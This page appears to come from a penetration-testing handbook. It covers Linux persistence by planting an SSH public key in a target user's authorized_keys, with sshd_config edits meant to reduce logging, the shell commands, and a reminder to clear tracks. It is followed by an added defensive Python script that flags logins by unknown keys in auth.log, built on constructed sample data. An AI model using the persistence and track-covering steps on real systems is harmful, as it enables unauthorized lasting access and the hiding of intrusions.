handbook/tools/5.Machine/1.Linux/General/Exploitation/2.Persistence/1.Account-Manipulation.md
2024-08-31 01:07:22 +02:00
General

Account manipulation using SSH keys is a way for an attacker to gain access to a system without using a password. SSH (Secure Shell) keys are used to authenticate a user to a remote system, allowing them to log in without entering a password. Instead of a password, the user presents a private key file, which is then verified against a public key stored on the remote system (in the user's authorized_keys file). If the private key corresponds to one of the listed public keys, the user is authenticated and granted access to the system.

An attacker who has gained access to a user's private SSH key can use it to log in to the system without knowing the user's password. This can be done by copying the private key to the attacker's own system and using it to authenticate to the remote system. If the attacker is able to do this, they will be able to log in to the system and perform actions as if they were the legitimate user. This can allow the attacker to gain unauthorized access to sensitive data or to perform actions that would not normally be allowed.

Command

Modify /etc/ssh/sshd_config (Target Machine)

# Comment out these lines
	# The handbook comments out LogLevel to avoid SSH logs; note that INFO is already sshd's default level, so authentication events are still written to the auth log
	# LogLevel INFO
	# Not needed, because the login uses an SSH key
	# PasswordAuthentication yes

# Uncomment this line
	# Allow login with SSH keys
	PubkeyAuthentication yes

Generating SSH Keys (Attacking Machine)

# Generate SSH keys (attacking machine)
ssh-keygen                       # Generate an SSH key pair (id_rsa and id_rsa.pub)

# Install the public key in the target user's authorized_keys (in that user's home directory on the target machine)
ls -al ~                         # List the home directory to see whether the .ssh folder is already there
mkdir -p ~/.ssh                  # Create the .ssh folder if needed
nano ~/.ssh/authorized_keys      # Create the file, paste the contents of id_rsa.pub and save

chmod 700 /home/USER/.ssh                    # Set the required permissions on the folder
chmod 600 /home/USER/.ssh/authorized_keys    # Set the required permissions on the file

SSH Connection (Attacking Machine)

ssh USER@IP

===Don't Forget to Clear Tracks (Check 🧹 CLEAR Logs & History)===
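From the defender's side, the weak point of this technique is that sshd records the fingerprint of every key used for a public-key login at its default LogLevel. The following script is an added example (not part of the handbook) that computes the fingerprint of each approved authorized_keys entry and flags logins made with any other key; the key blob and the auth.log lines are constructed for the demonstration and are not real.

```python
import base64
import hashlib
import re

# sshd's public-key login record at the default LogLevel (INFO), e.g.
# "Accepted publickey for alice from 203.0.113.5 port 51234 ssh2: ED25519 SHA256:..."
ACCEPTED_RE = re.compile(
    r"Accepted publickey for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2: "
    r"(?P<keytype>\S+) (?P<fp>SHA256:[A-Za-z0-9+/]+)"
)


def fingerprint(authorized_keys_line: str) -> str:
    """Return the SHA256 fingerprint (as sshd logs it) of one authorized_keys entry."""
    fields = authorized_keys_line.split()
    # An entry may carry options such as from="..." before the key type;
    # the base64 key blob is always the field right after the key type.
    for i, field in enumerate(fields):
        if field.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
            blob = base64.b64decode(fields[i + 1])
            digest = hashlib.sha256(blob).digest()
            # OpenSSH prints the digest as unpadded base64
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("no public key found in entry")


def audit_logins(log_lines, allowed_fingerprints):
    """Return (user, source, fingerprint) for each public-key login with a non-allowlisted key."""
    findings = []
    for line in log_lines:
        m = ACCEPTED_RE.search(line)
        if m and m.group("fp") not in allowed_fingerprints:
            findings.append((m.group("user"), m.group("src"), m.group("fp")))
    return findings


# Constructed ed25519 key blob: string("ssh-ed25519") + string(32 bytes of 0x01); not a real key.
_BLOB = b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + b"\x01" * 32
APPROVED_KEY = "ssh-ed25519 " + base64.b64encode(_BLOB).decode() + " alice@laptop"
ALLOWED = {fingerprint(APPROVED_KEY)}
ROGUE_FP = "SHA256:" + "A" * 43  # placeholder fingerprint standing in for an attacker-added key

# Constructed auth.log excerpt: an approved-key login, an unknown-key login, and a password login.
SAMPLE_LOG = [
    f"Aug 31 01:07:22 host sshd[1234]: Accepted publickey for alice from 203.0.113.5 port 51234 ssh2: ED25519 {fingerprint(APPROVED_KEY)}",
    f"Aug 31 01:09:10 host sshd[1300]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2: RSA {ROGUE_FP}",
    "Aug 31 01:10:00 host sshd[1350]: Accepted password for bob from 203.0.113.9 port 40100 ssh2",
]


def run_sample():
    return audit_logins(SAMPLE_LOG, ALLOWED)


if __name__ == "__main__":
    for user, src, fp in run_sample():
        print(f"login by {user} from {src} with a key not in authorized baseline: {fp}")
```

In practice the allowlist is built from the authorized_keys files of every account on the host (compare them against a known-good copy as well), and the log lines come from /var/log/auth.log or journalctl -u ssh.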